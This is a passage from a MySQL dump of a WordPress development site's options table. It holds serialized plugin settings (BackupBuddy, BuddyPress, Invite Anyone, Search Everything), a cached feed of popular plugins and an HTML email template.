+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"51888@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:111:\"Build responsive page layouts using the widgets you know and love using this simple drag and drop page builder.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Greg Priday\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Wordfence Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/plugins/wordfence/#post-29832\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 04 Sep 2011 03:13:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"29832@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:137:\"Wordfence Security is a free enterprise class security and performance plugin that makes your site up to 50 times faster and more secure.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Wordfence\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"NextGEN Facebook - Advanced Social SEO for Facebook, Google+, Pinterest, Twitter & More\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://wordpress.org/plugins/nextgen-facebook/#post-40409\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 Jul 2012 20:13:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"40409@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:132:\"Display your content in the best possible way on Facebook, Google+, Twitter, Pinterest, etc. - no matter how your webpage is shared!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"JS Morisset\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Advanced Custom Fields\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/plugins/advanced-custom-fields/#post-25254\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 17 Mar 2011 04:07:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"25254@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"Customise WordPress with powerful, professional and intuitive fields\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"elliotcondon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Google XML Sitemaps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/plugins/google-sitemap-generator/#post-132\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 22:31:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"132@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"This plugin will generate a special XML sitemap which will help search engines to better index your blog.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Arne Brachhold\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"iThemes Security (formerly Better WP Security)\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/better-wp-security/#post-21738\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 22 Oct 2010 22:06:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"21738@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"The easiest, most effective way to secure WordPress in seconds.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Chris Wiegman\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:46:\"https://wordpress.org/plugins/rss/view/popular\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:11:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Mon, 16 Feb 2015 21:07:45 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:7:\"expires\";s:29:\"Mon, 16 Feb 2015 21:36:01 GMT\";s:13:\"cache-control\";s:0:\"\";s:6:\"pragma\";s:0:\"\";s:13:\"last-modified\";s:31:\"Mon, 16 Feb 2015 21:01:01 +0000\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 249\";}s:5:\"build\";s:14:\"20150216205945\";}','no'),
(117,'_transient_timeout_feed_mod_b9388c83948825c1edaef0d856b7b109','1424164065','no'),
(118,'_transient_feed_mod_b9388c83948825c1edaef0d856b7b109','1424120865','no'),
(119,'_transient_timeout_plugin_slugs','1424209363','no'),
(120,'_transient_plugin_slugs','a:13:{i:0;s:49:\"add-new-default-avatar/kl_addnewdefaultavatar.php\";i:1;s:30:\"advanced-custom-fields/acf.php\";i:2;s:19:\"bbpress/bbpress.php\";i:3;s:24:\"buddypress/bp-loader.php\";i:4;s:49:\"buddypress-auto-group-join/bp-auto-group-join.php\";i:5;s:26:\"buddypress-docs/loader.php\";i:6;s:64:\"buddypress-group-email-subscription/bp-activity-subscription.php\";i:7;s:33:\"events-manager/events-manager.php\";i:8;s:31:\"invite-anyone/invite-anyone.php\";i:9;s:19:\"members/members.php\";i:10;s:66:\"remove-dashboard-access-for-non-admins/remove-dashboard-access.php\";i:11;s:39:\"search-everything/search-everything.php\";i:12;s:25:\"wp-better-emails/wpbe.php\";}','no'),
(121,'_transient_timeout_dash_4077549d03da2e451c8b5f002294ff51','1424164065','no'),
(122,'_transient_dash_4077549d03da2e451c8b5f002294ff51','<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2014/12/dinah/\'>WordPress 4.1 “Dinah”</a> <span class=\"rss-date\">December 18, 2014</span><div class=\"rssSummary\">Version 4.1 of WordPress, named “Dinah” in honor of jazz singer Dinah Washington, is available for download or update in your WordPress dashboard. New features in WordPress 4.1 help you focus on your writing, and the new default theme lets you show it off in style. Introducing Twenty Fifteen Our newest default theme, Twenty Fifteen, is […]</div></li></ul></div><div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'http://wptavern.com/tickets-on-sale-for-wordcamp-north-canton-oh-2015\'>WPTavern: Tickets On Sale For WordCamp North Canton, OH, 2015</a></li><li><a class=\'rsswidget\' href=\'http://ma.tt/2015/02/jonathan-ive-profile/\'>Matt: Jonathan Ive Profile</a></li><li><a class=\'rsswidget\' href=\'http://ma.tt/2015/02/pollan-on-psychedelics/\'>Matt: Pollan on Psychedelics</a></li></ul></div><div class=\"rss-widget\"><ul><li class=\'dashboard-news-plugin\'><span>Popular Plugin:</span> <a href=\'https://wordpress.org/plugins/siteorigin-panels/\' class=\'dashboard-news-plugin-link\'>Page Builder by SiteOrigin</a> <span>(<a href=\'plugin-install.php?tab=plugin-information&plugin=siteorigin-panels&_wpnonce=1513f89d19&TB_iframe=true&width=600&height=800\' class=\'thickbox\' title=\'Page Builder by SiteOrigin\'>Install</a>)</span></li></ul></div>','no'),
(124,'_transient_twentyfifteen_categories','1','yes'),
(125,'theme_mods_twentyfifteen','a:1:{s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1424121430;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}}}}','yes'),
(126,'current_theme','Open Source Commons','yes'),
(127,'theme_mods_commons','a:2:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:8:\"main-nav\";i:2;}}','yes'),
(128,'theme_switched','','yes'),
(129,'recently_activated','a:0:{}','yes'),
(130,'pb_backupbuddy','a:76:{s:12:\"data_version\";s:1:\"8\";s:21:\"importbuddy_pass_hash\";s:0:\"\";s:23:\"importbuddy_pass_length\";i:0;s:16:\"backup_reminders\";i:1;s:16:\"edits_since_last\";i:0;s:17:\"last_backup_start\";i:0;s:18:\"last_backup_finish\";i:0;s:18:\"last_backup_serial\";s:0:\"\";s:17:\"last_backup_stats\";a:0:{}s:19:\"force_compatibility\";i:0;s:29:\"force_mysqldump_compatibility\";i:0;s:9:\"schedules\";a:0:{}s:9:\"log_level\";s:1:\"1\";s:13:\"high_security\";i:0;s:19:\"next_schedule_index\";i:100;s:13:\"archive_limit\";i:0;s:18:\"archive_limit_size\";i:0;s:17:\"archive_limit_age\";i:0;s:26:\"delete_archives_pre_backup\";i:0;s:23:\"lock_archives_directory\";i:0;s:28:\"email_notify_scheduled_start\";s:0:\"\";s:36:\"email_notify_scheduled_start_subject\";s:49:\"BackupBuddy Scheduled Backup Started - {site_url}\";s:33:\"email_notify_scheduled_start_body\";s:140:\"A scheduled backup has started with BackupBuddy v{backupbuddy_version} on {current_datetime} for the site {site_url}.\n\nDetails:\r\n\r\n{message}\";s:31:\"email_notify_scheduled_complete\";s:0:\"\";s:39:\"email_notify_scheduled_complete_subject\";s:50:\"BackupBuddy Scheduled Backup Complete - {site_url}\";s:36:\"email_notify_scheduled_complete_body\";s:142:\"A scheduled backup has completed with BackupBuddy v{backupbuddy_version} on {current_datetime} for the site {site_url}.\n\nDetails:\r\n\r\n{message}\";s:24:\"email_notify_send_finish\";s:0:\"\";s:32:\"email_notify_send_finish_subject\";s:43:\"BackupBuddy File Send Finished - {site_url}\";s:29:\"email_notify_send_finish_body\";s:146:\"A destination file send has finished with BackupBuddy v{backupbuddy_version} on {current_datetime} for the site {site_url}.\n\nDetails:\r\n\r\n{message}\";s:18:\"email_notify_error\";s:11:\"[email protected]\";s:26:\"email_notify_error_subject\";s:30:\"BackupBuddy Error - {site_url}\";s:23:\"email_notify_error_body\";s:132:\"An error occurred with BackupBuddy v{backupbuddy_version} on {current_datetime} for the site {site_url}. Error details:\r\n\r\n{message}\";s:12:\"email_return\";s:0:\"\";s:19:\"remote_destinations\";a:0:{}s:11:\"role_access\";s:16:\"activate_plugins\";s:16:\"dropboxtemptoken\";s:0:\"\";s:11:\"backup_mode\";s:1:\"2\";s:16:\"multisite_export\";s:1:\"0\";s:16:\"backup_directory\";s:0:\"\";s:14:\"temp_directory\";s:0:\"\";s:13:\"log_directory\";s:0:\"\";s:10:\"log_serial\";s:0:\"\";s:13:\"notifications\";a:0:{}s:19:\"zip_method_strategy\";s:1:\"1\";s:24:\"database_method_strategy\";s:3:\"php\";s:17:\"alternative_zip_2\";s:1:\"0\";s:19:\"ignore_zip_warnings\";s:1:\"0\";s:19:\"ignore_zip_symlinks\";s:1:\"1\";s:25:\"disable_zipmethod_caching\";s:1:\"0\";s:19:\"archive_name_format\";s:8:\"datetime\";s:30:\"disable_https_local_ssl_verify\";s:1:\"0\";s:17:\"save_comment_meta\";s:1:\"1\";s:27:\"ignore_command_length_check\";s:1:\"0\";s:18:\"default_backup_tab\";s:1:\"0\";s:18:\"deployment_allowed\";s:1:\"0\";s:10:\"remote_api\";a:2:{s:4:\"keys\";a:0:{}s:3:\"ips\";a:0:{}}s:20:\"skip_spawn_cron_call\";s:1:\"0\";s:5:\"stats\";a:6:{s:9:\"site_size\";i:0;s:18:\"site_size_excluded\";i:0;s:17:\"site_size_updated\";i:0;s:7:\"db_size\";i:0;s:16:\"db_size_excluded\";i:0;s:15:\"db_size_updated\";i:0;}s:9:\"disalerts\";a:0:{}s:15:\"breakout_tables\";s:1:\"1\";s:19:\"include_importbuddy\";s:1:\"1\";s:17:\"max_site_log_size\";s:1:\"5\";s:11:\"compression\";s:1:\"1\";s:25:\"no_new_backups_error_days\";s:2:\"45\";s:15:\"skip_quicksetup\";s:1:\"0\";s:13:\"prevent_flush\";s:1:\"0\";s:17:\"rollback_cleanups\";a:0:{}s:20:\"phpmysqldump_maxrows\";s:0:\"\";s:20:\"disable_localization\";s:1:\"0\";s:18:\"max_execution_time\";s:0:\"\";s:24:\"backup_cron_rescheduling\";s:1:\"0\";s:20:\"force_single_db_file\";s:1:\"0\";s:11:\"deployments\";a:0:{}s:19:\"max_send_stats_days\";s:1:\"7\";s:20:\"max_send_stats_count\";s:1:\"6\";s:8:\"profiles\";a:3:{i:0;a:8:{s:4:\"type\";s:8:\"defaults\";s:5:\"title\";s:15:\"Global Defaults\";s:18:\"skip_database_dump\";s:1:\"0\";s:19:\"backup_nonwp_tables\";s:1:\"0\";s:15:\"integrity_check\";s:1:\"1\";s:29:\"mysqldump_additional_includes\";s:0:\"\";s:29:\"mysqldump_additional_excludes\";s:0:\"\";s:8:\"excludes\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:2:\"db\";s:5:\"title\";s:13:\"Database Only\";s:3:\"tip\";s:49:\"Just your database. I like your minimalist style.\";}i:2;a:2:{s:4:\"type\";s:4:\"full\";s:5:\"title\";s:15:\"Complete Backup\";}}}','yes'),
(133,'bp-deactivated-components','a:0:{}','yes'),
(134,'bb-config-location','','yes'),
(135,'bp-xprofile-base-group-name','Base','yes'),
(136,'bp-xprofile-fullname-field-name','Name','yes'),
(137,'bp-blogs-first-install','','yes'),
(138,'bp-disable-profile-sync','','yes'),
(139,'hide-loggedout-adminbar','','yes'),
(140,'bp-disable-avatar-uploads','','yes'),
(141,'bp-disable-account-deletion','','yes'),
(142,'bp-disable-blogforum-comments','1','yes'),
(143,'_bp_theme_package_id','legacy','yes'),
(144,'bp_restrict_group_creation','','yes'),
(145,'_bp_enable_akismet','1','yes'),
(146,'_bp_enable_heartbeat_refresh','1','yes'),
(147,'_bp_force_buddybar','','yes'),
(148,'_bp_retain_bp_default','','yes'),
(149,'widget_bp_core_login_widget','','yes'),
(150,'widget_bp_core_members_widget','','yes'),
(151,'widget_bp_core_whos_online_widget','','yes'),
(152,'widget_bp_core_recently_active_widget','','yes'),
(153,'widget_bp_groups_widget','','yes'),
(154,'widget_bp_messages_sitewide_notices_widget','','yes'),
(155,'_transient_timeout__bp_is_new_install','1424121487','no'),
(156,'_transient__bp_is_new_install','1','no'),
(159,'ass_digest_time','a:2:{s:5:\"hours\";s:2:\"05\";s:7:\"minutes\";s:2:\"00\";}','yes'),
(160,'ass_weekly_digest','4','yes'),
(162,'invite_anyone','a:7:{s:11:\"max_invites\";i:5;s:23:\"allow_email_invitations\";s:3:\"all\";s:23:\"message_is_customizable\";s:3:\"yes\";s:23:\"subject_is_customizable\";s:2:\"no\";s:28:\"can_send_group_invites_email\";s:3:\"yes\";s:24:\"bypass_registration_lock\";s:3:\"yes\";s:7:\"version\";s:5:\"1.3.6\";}','yes'),
(163,'rda_access_switch','manage_options','yes'),
(164,'rda_access_cap','manage_options','yes'),
(165,'rda_redirect_url','http://opensource-commons.dev','yes'),
(166,'rda_enable_profile','1','yes'),
(167,'rda_login_message','','yes'),
(168,'wordfence_version','5.3.6','yes'),
(169,'wordfenceActivated','1','yes'),
(170,'wf_plugin_act_error','','yes'),
(171,'wpbe_options','a:4:{s:10:\"from_email\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:8:\"template\";s:3255:\"<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n<html>\n <head>\n <meta http-equiv=\"Content-Type\" content=\"text/html;UTF-8\" />\n </head>\n <body style=\"margin: 0px; background-color: #F4F3F4; font-family: Helvetica, Arial, sans-serif; font-size:12px;\" text=\"#444444\" bgcolor=\"#F4F3F4\" link=\"#21759B\" alink=\"#21759B\" vlink=\"#21759B\" marginheight=\"0\" topmargin=\"0\" marginwidth=\"0\" leftmargin=\"0\">\n <table cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" bgcolor=\"#F4F3F4\" border=\"0\">\n <tr>\n <td style=\"padding:15px;\">\n <center>\n <table width=\"550\" cellpadding=\"0\" bgcolor=\"#ffffff\" cellspacing=\"0\" align=\"center\">\n <tr>\n <td align=\"left\">\n <div style=\"border:solid 1px #d9d9d9;\">\n <table id=\"header\" width=\"100%\" border=\"0\" cellpadding=\"0\" bgcolor=\"#ffffff\" cellspacing=\"0\" style=\"line-height:1.6;font-size:12px;font-family: Helvetica, Arial, sans-serif;border:solid 1px #FFFFFF;color:#444;\">\n <tr>\n <td colspan=\"2\" background=\"http://opensource-commons.dev/wp-admin/images/white-grad-active.png\" height=\"30\" style=\"color:#ffffff;\" valign=\"bottom\">.</td>\n </tr>\n <tr>\n <td style=\"line-height:32px;padding-left:30px;\" valign=\"baseline\"><span style=\"font-size:32px;\"><a href=\"%blog_url%\" style=\"text-decoration:none;\" target=\"_blank\">%blog_name%</a></span></td>\n <td style=\"padding-right:30px;\" align=\"right\" valign=\"baseline\"><span style=\"font-size:14px;color:#777777\">%blog_description%</span></td>\n </tr>\n </table>\n <table id=\"content\" width=\"490\" border=\"0\" cellpadding=\"0\" bgcolor=\"#ffffff\" cellspacing=\"0\" style=\"margin-top:15px;margin-right:30px; margin-left:30px;color:#444;line-height:1.6;font-size:12px;font-family: Arial, sans-serif;color: #444;\">\n <tr>\n <td colspan=\"2\" style=\"border-top: solid 1px #d9d9d9\">\n <div style=\"padding:15px 0;\">\n %content%\n </div>\n </td>\n </tr>\n </table>\n <table id=\"footer\" width=\"490\" border=\"0\" cellpadding=\"0\" bgcolor=\"#ffffff\" cellspacing=\"0\" style=\"line-height:1.5;font-size:12px;font-family: Arial, sans-serif;margin-right:30px;margin-left:30px;\">\n <tr style=\"font-size:11px;color:#999999;\">\n <td style=\"border-top: solid 1px #d9d9d9;\" colspan=\"2\">\n <div style=\"padding-top:15px; padding-bottom:1px;\"><img height=\"13\" width=\"13\" style=\"vertical-align: middle;\" src=\"http://opensource-commons.dev/wp-admin/images/date-button.gif\" alt=\"Date\" /> Email sent %date% @ %time%</div>\n <div><img height=\"12\" width=\"12\" style=\"vertical-align: middle;\" src=\"http://opensource-commons.dev/wp-admin/images/comment-grey-bubble.png\" alt=\"Contact\" /> For any requests, please contact <a href=\"mailto:%admin_email%\">%admin_email%</a></div>\n </td>\n </tr>\n <tr>\n <td colspan=\"2\" style=\"color:#ffffff;\" height=\"15\">.</td>\n </tr>\n </table>\n </div>\n </td>\n </tr>\n </table>\n </center>\n </td>\n </tr>\n </table>\n </body>\n</html>\";s:18:\"plaintext_template\";s:89:\"%content%\n\n---\n\nEmail sent %date% @ %time%\nFor any requests, please contact %admin_email%\";}','yes'),
(172,'invite_anyone_db_version','1.3.7','yes'),
(495,'registration','0','yes'),
(496,'members_db_version','2','yes'),
(497,'members_settings','a:8:{s:12:\"role_manager\";i:1;s:19:\"content_permissions\";i:1;s:12:\"private_blog\";i:0;s:12:\"private_feed\";i:0;s:17:\"login_form_widget\";i:0;s:12:\"users_widget\";i:0;s:25:\"content_permissions_error\";s:85:\"<p class=\"restricted\">Sorry, but you do not have permission to view this content.</p>\";s:18:\"private_feed_error\";s:80:\"<p class=\"restricted\">You must be logged into the site to view this content.</p>\";}','yes'),
(500,'se_meta','a:10:{s:7:\"blog_id\";b:0;s:7:\"api_key\";b:0;s:8:\"auth_key\";b:0;s:7:\"version\";s:5:\"8.1.3\";s:13:\"first_version\";s:5:\"8.1.3\";s:8:\"new_user\";b:1;s:4:\"name\";s:0:\"\";s:5:\"email\";s:0:\"\";s:24:\"show_options_page_notice\";b:0;s:16:\"se_global_notice\";N;}','yes'),
(501,'se_options','a:21:{s:21:\"se_exclude_categories\";s:0:\"\";s:26:\"se_exclude_categories_list\";s:0:\"\";s:16:\"se_exclude_posts\";s:0:\"\";s:21:\"se_exclude_posts_list\";s:0:\"\";s:18:\"se_use_page_search\";b:0;s:21:\"se_use_comment_search\";b:1;s:17:\"se_use_tag_search\";b:0;s:17:\"se_use_tax_search\";b:0;s:22:\"se_use_category_search\";b:1;s:25:\"se_approved_comments_only\";b:1;s:22:\"se_approved_pages_only\";b:0;s:21:\"se_use_excerpt_search\";b:0;s:19:\"se_use_draft_search\";b:0;s:24:\"se_use_attachment_search\";b:0;s:14:\"se_use_authors\";b:0;s:18:\"se_use_cmt_authors\";b:0;s:22:\"se_use_metadata_search\";b:0;s:16:\"se_use_highlight\";b:1;s:18:\"se_highlight_color\";s:6:\"orange\";s:18:\"se_highlight_style\";s:0:\"\";s:19:\"se_research_metabox\";a:3:{s:18:\"visible_on_compose\";b:1;s:23:\"external_search_enabled\";b:0;s:14:\"notice_visible\";b:1;}}','yes'),
(502,'acf_version','4.4.0','yes'),
(505,'_bbp_db_version','250','yes'),
(506,'bp-active-components','a:7:{s:8:\"xprofile\";s:1:\"1\";s:8:\"settings\";s:1:\"1\";s:8:\"activity\";s:1:\"1\";s:13:\"notifications\";s:1:\"1\";s:6:\"groups\";s:1:\"1\";s:5:\"blogs\";s:1:\"1\";s:7:\"members\";s:1:\"1\";}','yes'),
(507,'bp-pages','a:3:{s:7:\"members\";i:25;s:8:\"activity\";i:9;s:6:\"groups\";i:23;}','yes'),
(508,'_bp_db_version','9181','yes'),
(509,'bp_docs_attachment_protection','1','yes'),
